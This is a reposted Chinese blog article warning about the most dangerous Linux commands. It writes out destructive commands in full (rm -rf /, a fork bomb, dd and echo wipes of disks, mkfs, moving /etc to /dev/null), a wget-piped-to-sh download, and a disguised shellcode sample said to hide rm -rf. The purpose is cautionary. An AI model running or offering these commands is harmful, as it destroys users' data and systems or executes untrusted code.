Linux的10个最危险命令
2022-10-4 18:27:30 Author: 橘猫学安全(查看原文) 阅读量:12 收藏

文章来源:Linux就该这么学

rm -rf 命令

该命令可能导致不可恢复的系统崩坏。

> rm -rf /  #强制删除根目录下所有东西。
> rm -rf *  #强制删除当前目录的所有文件。
> rm -rf .  #强制删除当前文件夹及其子文件夹。

执行rm -rf 一定要想半天,搞明白自己在干什么.

fork 炸弹

:() { :|:& };:

不太好理解可以转换成

bomb()
{
    bomb|bomb&
};
bomb

一旦执行起来,-bash: fork: Cannot allocate memory,会把系统资源消耗殆尽。它会调用自己两次,一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。

echo "" > /dev/sda

该操作会将在块设备中的所有数据块替换为命令写入的原始数据,从而导致整个块设备的数据丢失。

mv 文件夹 /dev/null

> mv /etc /dev/null

/dev/null 或 null 设备是一个特殊的文件,所有写入它的数据都会被清除,然后返回写操作成功。但是这个命令并不能阻止数据恢复软件——所以,真正的彻底毁灭,需要采用专用的软件或者手法来完成。

下载的文件立即执行

> wget http://rumenz.com/rumenz.sh -O- | sh

如果rumenz.sh是一个病毒脚本,就完蛋了。下载脚本文件之前要看看里面的内容,有危险的操作就不要执行。

mkfs.ext3 /dev/sdb

这个命令会格式化块设备sdb,在执行这个命令后你的块设备(硬盘驱动器)会被格式化,直接让你的系统达到不可恢复的阶段。

重定向输出到文件

>  > rumenz.txt

这个命令常用来清空文件内容或记录命令输出,执行之前请考虑清楚。

硬盘清零

> dd if=/dev/zero of=/dev/had

这个命令会将整个主硬盘清零

执行伪装后的命令

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

上面的命令就是rm -rf ,这里的代码是隐藏在十六进制里的,可能会擦除你的根分区,所以看不懂的命令千万不能执行,非要看效果,请在虚拟机中执行。

如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell
「 超详细 | 分享 」手把手教你如何进行内网渗透
神兵利器 | siusiu-渗透工具管理套件
一款功能全面的XSS扫描器
实战 | 一次利用哥斯拉马绕过宝塔waf
BurpCrypto: 万能网站密码爆破测试工具
快速筛选真实IP并整理为C段 -- 棱眼
自动探测端口顺便爆破工具t14m4t
渗透工具|无状态子域名爆破工具(1秒扫160万个子域)
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247499264&idx=2&sn=22dedc35bda2015b010c69900f3dff6f&chksm=c04d793ef73af028495ffd4223ca4c3e540c456ae17f4fb1c268a7eb3331c46fbeff23d5c5cd#rd
如有侵权请联系:admin#unsafe.sh